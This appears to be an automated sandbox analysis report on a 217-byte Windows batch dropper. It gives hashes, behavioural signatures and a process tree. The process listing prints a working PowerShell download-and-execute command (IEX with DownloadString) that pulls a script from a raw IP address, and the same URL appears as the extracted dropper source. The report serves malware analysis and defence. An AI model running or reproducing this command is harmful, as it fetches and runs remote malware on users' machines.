Analysis
max time kernel: 123s
max time network: 142s
platform: windows7_x64
resource: win7
submitted: 02-09-2020 21:10
Static task: static1

Behavioral task: behavioral1
  Sample: cfc86f216b68d4b768a61dc8091a67ab.bat
  Resource: win7 (windows7_x64)
  0 signatures, 0 seconds

Behavioral task: behavioral2
  Sample: cfc86f216b68d4b768a61dc8091a67ab.bat
  Resource: win10v200722 (windows10_x64)
  0 signatures, 0 seconds
General
Target: cfc86f216b68d4b768a61dc8091a67ab.bat
Size: 217B
MD5: 89876aac9d3c6644f7ae3b4cf68d7a1e
SHA1: e37353d60d13106478fd94133ec1ae8b15e51062
SHA256: 146be0d88aa964787807ec908e13f1eb124530caca22ad1c3d80c73761892e90
SHA512: 8ea7a17a997a6b12f0acac1951fe0dc70c57221bd2204173597b951e7bf77b3f1f94a5ded81f074f51cb159d4ebe7bf7db1c207fd4febcfae1183788890ee503
Score: 10/10
Malware Config
Extracted
Language: ps1
Source URLs (ps1.dropper): http://185.103.242.78/pastes/cfc86f216b68d4b768a61dc8091a67ab
Signatures

Blacklisted process makes network request (1 IoC)
Processes:
  flow | pid  | process
  5    | 1040 | powershell.exe

Suspicious behavior: CmdExeWriteProcessMemorySpam (1 IoC)
Processes:
  pid  | process
  1040 | powershell.exe

Suspicious behavior: EnumeratesProcesses (2 IoCs)
Processes:
  pid  | process
  1040 | powershell.exe
  1040 | powershell.exe

Suspicious use of AdjustPrivilegeToken (1 IoC)
Processes:
  description              | pid  | process
  Token: SeDebugPrivilege  | 1040 | powershell.exe

Suspicious use of WriteProcessMemory (4 IoCs)
Processes:
  description                      | pid  | process | target process
  PID 1460 wrote to memory of 1040 | 1460 | cmd.exe | powershell.exe
  PID 1460 wrote to memory of 1040 | 1460 | cmd.exe | powershell.exe
  PID 1460 wrote to memory of 1040 | 1460 | cmd.exe | powershell.exe
  PID 1460 wrote to memory of 1040 | 1460 | cmd.exe | powershell.exe
Processes

C:\Windows\system32\cmd.exe
  Command line: cmd /c "C:\Users\Admin\AppData\Local\Temp\cfc86f216b68d4b768a61dc8091a67ab.bat"
  PID: 1460
  - Suspicious use of WriteProcessMemory

  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (child of PID 1460)
    Command line: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/cfc86f216b68d4b768a61dc8091a67ab');Invoke-ABXNAAYIVS;Start-Sleep -s 10000"
    PID: 1040
    - Blacklisted process makes network request
    - Suspicious behavior: CmdExeWriteProcessMemorySpam
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken